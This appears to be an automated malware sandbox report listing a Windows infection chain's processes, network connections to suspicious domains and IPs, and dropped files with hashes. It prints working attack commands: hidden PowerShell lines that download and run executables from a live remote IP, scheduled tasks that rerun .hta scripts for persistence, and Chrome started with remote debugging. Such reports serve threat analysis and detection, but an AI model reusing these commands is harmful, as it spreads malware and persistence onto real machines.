PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 1556 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe C:\Windows\SysWOW64\mshta.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2000 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 2680 wrote to memory of 1372 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1372 wrote to memory of 2920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2920 wrote to memory of 1516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1672 wrote to memory of 1452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE
PID 1672 wrote to memory of 1452 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1452 -s 68

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn jIzd4maWSGR /tr "mshta C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE

"C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6849758,0x7fef6849768,0x7fef6849778

C:\Windows\system32\ctfmon.exe

ctfmon.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "6fLQXma4qrZ" /tr "mshta \"C:\Temp\My6dz0IVO.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1868 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2088 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\My6dz0IVO.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2452 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3516 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3636 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3624 --field-trial-handle=1840,i,15450408259808483725,12150644784737290761,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe

"C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {ED4AE890-6A52-4F3B-8F30-ACF88E571A55} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]

C:\ProgramData\omlnpw\uxek.exe

C:\ProgramData\omlnpw\uxek.exe

C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ym7yu" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe"

C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe

"C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe"

C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 68

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.200.14:443 apis.google.com tcp
GB 216.58.213.10:443 ogads-pa.googleapis.com tcp
GB 216.58.213.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 play.google.com udp
FI 65.109.226.203:443 65.109.226.203 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
FI 65.109.226.203:443 65.109.226.203 tcp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
DE 104.194.157.122:80 104.194.157.122 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 172.67.198.28:443 pirtyoffensiz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
FI 65.109.226.203:443 65.109.226.203 tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
FI 65.109.226.203:443 65.109.226.203 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
US 104.21.94.161:443 advertised.life tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 172.67.198.28:443 pirtyoffensiz.bet tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 8.8.8.8:53 importenptoc.com udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 104.21.16.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 172.67.218.33:443 outlinedtrai.bet tcp

Files

memory/2348-0-0x0000000000220000-0x00000000006F0000-memory.dmp

memory/2348-1-0x0000000077BA0000-0x0000000077BA2000-memory.dmp

memory/2348-2-0x0000000000221000-0x0000000000289000-memory.dmp

memory/2348-3-0x0000000000220000-0x00000000006F0000-memory.dmp

memory/2348-4-0x0000000000220000-0x00000000006F0000-memory.dmp

\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 a3ec4b44e7677c12a76bf51f45480133
SHA1 15587b7a0420115e979461490689a79beca64118
SHA256 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA512 4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075

memory/2680-20-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2348-18-0x0000000006FF0000-0x00000000074C0000-memory.dmp

memory/2348-21-0x0000000000221000-0x0000000000289000-memory.dmp

memory/2348-17-0x0000000000220000-0x00000000006F0000-memory.dmp

memory/2680-22-0x0000000000FE1000-0x0000000001049000-memory.dmp

memory/2680-23-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-25-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-26-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-27-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2680-29-0x0000000000FE1000-0x0000000001049000-memory.dmp

memory/2680-28-0x0000000000FE0000-0x00000000014B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/1452-59-0x0000000000EE0000-0x0000000000F90000-memory.dmp

memory/1748-75-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-73-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-72-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1748-70-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-68-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-66-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-64-0x0000000000400000-0x000000000045F000-memory.dmp

memory/1748-62-0x0000000000400000-0x000000000045F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/2680-90-0x0000000000FE0000-0x00000000014B0000-memory.dmp

memory/2876-94-0x0000000000400000-0x000000000086A000-memory.dmp

memory/2680-93-0x0000000006710000-0x0000000006B7A000-memory.dmp

memory/1472-102-0x000000013F730000-0x000000013FBEB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabCB0.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarD20.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0dadbeb6cb656c1adadb2015c5727321
SHA1 7bdb83d1c1dbbe875804d6ec90d87fc205638c16
SHA256 323066e5228b20f9be99a08a9d14695423f8b12198ef49ff4bd537988e98c9ce
SHA512 067cf6d24c40d0775e11c3fc0d9e8819d6dc63f92362fbbd82ec4dc25f38b92f2891da5c3811931821ae4937f4df290f16e4f1b3dd37145b75e6d2e9d4dfac41

C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\XIny8bdjV.hta

MD5 ae563590dd5b65fb84045428b3c11628
SHA1 5690c743b714148b4017ea721dad61b654976dce
SHA256 0ef0e06906218a3cbe624c964e5fd67bf277e3d3ee6cf291af5db22ceada9d88
SHA512 2186ad4b4bbc1f9180139d38f9d89369561e7bc867359d424a0984ac7683ce86ab30d5dfd2697f6249988b102358e769f41e275bb8b1917d845a4e5b7294827a

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/1452-277-0x0000000001270000-0x00000000016C2000-memory.dmp

memory/2680-276-0x0000000006710000-0x0000000006B7A000-memory.dmp

memory/2876-274-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1672-273-0x0000000006440000-0x0000000006892000-memory.dmp

memory/1672-272-0x0000000006440000-0x0000000006892000-memory.dmp

memory/1452-296-0x0000000001270000-0x00000000016C2000-memory.dmp

memory/1452-297-0x0000000001270000-0x00000000016C2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 9b007a287efa6b3a81140630ab982f57
SHA1 5d25771df48e4f684da495be34f9f4397cc1b262
SHA256 6003b304cea7770b10db506f07194eacfa3a0a794df79bc42af91cacca68c02c
SHA512 3e97c17b2661d1b9476bb0b195e6773c68f13564e952f6758cbf8078160fdf31b0d8ea04f8465ad4c8475819e6f50a054178d07ce2d18482c8422a232511ded8

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Temp\My6dz0IVO.hta

